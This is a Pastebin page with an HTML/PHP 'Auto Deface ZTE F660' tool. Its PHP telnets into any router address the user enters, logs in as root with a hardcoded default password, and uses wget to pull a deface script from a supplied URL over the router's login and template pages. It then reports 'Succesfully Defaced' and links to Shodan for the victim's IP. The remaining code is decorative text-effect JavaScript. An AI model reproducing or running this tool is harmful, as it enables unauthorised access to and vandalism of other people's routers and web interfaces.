Advertisement
Guest User

:v

a guest
Feb 17th, 2016
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.27 KB | None | 0 0
  1. <html>
  2. <head>
  3. <link rel="SHORTCUT ICON" href="http://icons.iconarchive.com/icons/webalys/kameleon.pics/512/Hacker-icon.png">
  4. <title>Auto Deface ZTE F660</title>
  5. <meta content='Ref' name='copyright'/>
  6. <meta content='Ref' name='author'/>
  7. <meta name="robots" content="index, follow">
  8. <meta name="keywords" content="Hacking ZTE F660">
  9. <meta name="description" content="Replace ZTE F660 System">
  10. <meta name="author" content="Ref">
  11. <meta name="googlebot" content="index, follow">
  12. <meta name="rating" content="general">
  13. <meta name="copyright" content="Ref @ 2016. All rights reserved.">
  14. <meta name="language" content="en">
  15. <meta name="web_content_type" content="Personal Website">
  16. <meta name="country" content="id, en">
  17. <meta name="contact" content="Ref">
  18. <meta name="google rank" content="1">
  19. <meta name="robots" content="all">
  20. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  21. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  22.  
  23. <style type="text/css">
  24. html,body {
  25. background: url(http://assets.investmentu.com/contents/2014/12/hacker.png) no-repeat center center fixed;
  26. -webkit-background-size: 100% 100%;
  27. -moz-background-size: 100% 100%;
  28. -o-background-size: 100% 100%;
  29. background-size: 100% 100%;
  30. }
  31. .Button{
  32. width:50px;
  33. height:25px;
  34. font-family:Iceland;
  35. background: #ff4d4d;
  36. border:0px solid #999;
  37. border-radius:3px;
  38. transition:box-shadow, background 0.25s;
  39. }
  40. .depth {
  41.  
  42. border: 0px solid silver;
  43. background: linear-gradient(#ff3333, #fff);
  44. transition: all 0.3s ease-out;
  45. padding: 4px;
  46. color: #ff0000;
  47. }
  48. .depth:focus {
  49. outline: none;
  50. background-position: 0 -1.7em;
  51. }
  52.  
  53. </style>
  54. <script>
  55. /*
  56. Uphill Text effect
  57. By JavaScript Kit (http://javascriptkit.com)
  58. Over 400+ free scripts here!
  59. */
  60.  
  61. function uphilltext(text){
  62. var temptext=text.toUpperCase()
  63. var size=1
  64. //go through the text, letter by letter
  65. for (i=0;i<temptext.length;i++){
  66. document.write(temptext.charAt(i).fontsize(size).bold())
  67. if (size<7)
  68. size++
  69. else
  70. size=1
  71. }
  72. }
  73. </script>
  74. </head>
  75. <style type="text/css"></style>
  76. <body><center>
  77. <font color="red" face="Iceland" size="67">[!]Hacking Router F660[!]<br></font>
  78. <img src="https://lh6.googleusercontent.com/-GcQKq2_dwRw/AAAAAAAAAAI/AAAAAAAAAAA/9b6Q9LwVOb4/photo.jpg width="100" height="100"><br>
  79. <font face="Iceland" color="white" size="5">Herp Watching You!</font><br><br>
  80. <font face="Iceland" color="white" size="4">
  81. <?php
  82. error_log(0);
  83. if($_POST) {
  84. $sc = $_POST['sc'];
  85. $host = $_POST['host'];
  86. $port = $_POST['port'];
  87. $user = "root";
  88. $pass = "Zte521";
  89. $socket = fsockopen($host, $port) or die ($host." Die !");
  90. sleep(5);
  91. fputs($socket, "$user\r\n");
  92. sleep(4);
  93. fputs($socket, "$pass\r\n");
  94. sleep(4);
  95. fputs($socket, "cd home/httpd \r\n");
  96. sleep(4);
  97. fputs($socket,"wget -O login.gch $sc \r\n");
  98. sleep(5);
  99. fputs($socket,"wget -O template.gch $sc \r\n");
  100. sleep(5);
  101. fputs($socket,"wget -O setlang.gch $sc \r\n");
  102. sleep(5);
  103. fclose($socket);
  104. $bs = file_get_contents("http://$host");
  105. if(preg_match("#hacked#si",$bs)){
  106. echo "<a href=\"http://$host\" target=\"_BLANK\">$host</a> Succesfully Defaced ! Nice <br>";
  107. echo "<a href=\"https://www.shodan.io/host/$host\" target=\"_BLANK\">IP Info :</a><hr>";
  108. } else { echo "Failed to Deface , Find other Target<br>"; }
  109. }
  110. else {
  111. echo "<center><form method=\"post\" action=\"?f660\"><input class=\"depth\" type=\"text\" name=\"host\" placeholder=\"116.12.229.103\">\n";
  112. echo "<select class=\"depth\" name=\"port\">\n";
  113. echo " <option value=\"23\">23</option>\n";
  114. echo " <option value=\"1023\">1023</option>\n";
  115. echo "</select>\n";
  116. echo "<input class=\"depth\" type=\"text\" name=\"sc\" placeholder=\"URL Deface Script\">\n";
  117. echo "<hr><input type=\"submit\" class=\"Button\" value=\"Hack\" >\n";
  118. echo "<hr>*Input Target Without http://<br>*Default Port 23<br>*URL Deface Script , for Example http://pastebin.com/raw/UyvLdypD<hr>\n";
  119. echo "<center>\n";
  120. }
  121. ?>
  122. <a href="#Ganteng"><script language="JavaScript1.2">
  123.  
  124. /*
  125. Neon Lights Text
  126. By JavaScript Kit (http://javascriptkit.com)
  127. Over 400+ free scripts here!
  128. */
  129.  
  130. var message="Re-Developed by Ref - Thanks to 0x1999"
  131. var neonbasecolor="gray"
  132. var neontextcolor="yellow"
  133. var flashspeed=100 //in milliseconds
  134.  
  135. ///No need to edit below this line/////
  136.  
  137. var n=0
  138. if (document.all||document.getElementById){
  139. document.write('')
  140. for (m=0;m<message.length;m++)
  141. document.write('<span id="neonlight'+m+'">'+message.charAt(m)+'</span>')
  142. document.write('')
  143. }
  144. else
  145. document.write(message)
  146.  
  147. function crossref(number){
  148. var crossobj=document.all? eval("document.all.neonlight"+number) : document.getElementById("neonlight"+number)
  149. return crossobj
  150. }
  151.  
  152. function neon(){
  153.  
  154. //Change all letters to base color
  155. if (n==0){
  156. for (m=0;m<message.length;m++)
  157. //eval("document.all.neonlight"+m).style.color=neonbasecolor
  158. crossref(m).style.color=neonbasecolor
  159. }
  160.  
  161. //cycle through and change individual letters to neon color
  162. crossref(n).style.color=neontextcolor
  163.  
  164. if (n<message.length-1)
  165. n++
  166. else{
  167. n=0
  168. clearInterval(flashing)
  169. setTimeout("beginneon()",1500)
  170. return
  171. }
  172. }
  173.  
  174. function beginneon(){
  175. if (document.all||document.getElementById)
  176. flashing=setInterval("neon()",flashspeed)
  177. }
  178. beginneon()
  179.  
  180. </script> </a>
  181. </body>
  182. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement